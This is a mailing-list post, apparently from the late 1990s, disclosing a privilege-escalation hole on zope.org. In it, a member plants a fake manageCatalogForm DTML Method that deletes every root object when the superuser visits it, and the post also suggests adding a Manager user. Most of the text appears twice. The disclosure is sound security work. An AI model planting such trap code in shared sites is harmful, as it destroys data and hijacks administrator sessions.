This is actually more relevant to zope.org, but will eventually be an issue
with PTK, I think.
Consider the folowing situation on zope.org: I register a News item, ask
for it to be
cataloged - then quickly delete the object, replace it with a folder of the
same name. I then put in a DTML Method called manageCatalogForm into it
(which'd be called publish in PTK sites).
Now, according to a reply I got to one of my cataloging requests:
> itamar requests that an object be cataloged.
>
> View it:
> http://www.zope.org/Members/itamar/load_site
>
> Catalog it
> http://www.zope.org/Members/itamar/load_site/manageCatalogForm
>
> Make sure to be logged in as superuser to
> perform catalog entry adding.
I know that **superuser** is going to be visiting this DTML Method. So I
just
add this to my fake manageCatalogForm:
<dtml-if "AUTHNETICATED_USER.getUserName() == 'superuser'">
<dtml-call "PARENTS[-1].manage_delObjects(PARENTS[-1].objectIds())">
</dtml-if>
or add a Manager user to acl_users or whatever.
In the same way, whenever any other user of Zope.org is logged in and
viewing one of my pages, I can do whatever I want to their Member pages.
The problem here of course is that viewing a page in Zope actually execute
codes - the Unix equivalent might be, for example, having '.' as the first
item in PATH.
The obvious solution is disallowing use of DTML. But this is a general
problem in any Zope install where multiple users have write access, such as
hosting services.
--
Itamar S.T. itamars@ibm.net
with PTK, I think.
Consider the folowing situation on zope.org: I register a News item, ask
for it to be
cataloged - then quickly delete the object, replace it with a folder of the
same name. I then put in a DTML Method called manageCatalogForm into it
(which'd be called publish in PTK sites).
Now, according to a reply I got to one of my cataloging requests:
> itamar requests that an object be cataloged.
>
> View it:
> http://www.zope.org/Members/itamar/load_site
>
> Catalog it
> http://www.zope.org/Members/itamar/load_site/manageCatalogForm
>
> Make sure to be logged in as superuser to
> perform catalog entry adding.
I know that **superuser** is going to be visiting this DTML Method. So I
just
add this to my fake manageCatalogForm:
<dtml-if "AUTHNETICATED_USER.getUserName() == 'superuser'">
<dtml-call "PARENTS[-1].manage_delObjects(PARENTS[-1].objectIds())">
</dtml-if>
or add a Manager user to acl_users or whatever.
In the same way, whenever any other user of Zope.org is logged in and
viewing one of my pages, I can do whatever I want to their Member pages.
The problem here of course is that viewing a page in Zope actually execute
codes - the Unix equivalent might be, for example, having '.' as the first
item in PATH.
The obvious solution is disallowing use of DTML. But this is a general
problem in any Zope install where multiple users have write access, such as
hosting services.
--
Itamar S.T. itamars@ibm.net